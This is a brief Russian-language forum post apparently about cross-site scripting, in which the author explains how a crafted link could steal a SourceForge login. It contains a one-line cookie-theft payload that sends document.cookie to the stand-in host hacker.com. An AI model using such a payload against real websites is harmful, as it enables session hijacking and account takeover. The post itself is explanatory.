Новости | FAQ | Авторы | Документация | В действии | Библиотека |
Инструменты | Полезные ссылки | Хостинги | Скачать | Примеры | Форум |
Sanja v.2 13.03.2006 22:49 / 13.03.2006 22:52
Предположим, попалась мне ссылочка такого вида. Меняем alert на InnerHTML = "<img src='http://hacker.com/img.html?your_cookie=" +document.cookie + "' />" и хакер получает возможность влезть на sourceforge под моим логином. Здесь больше примеров.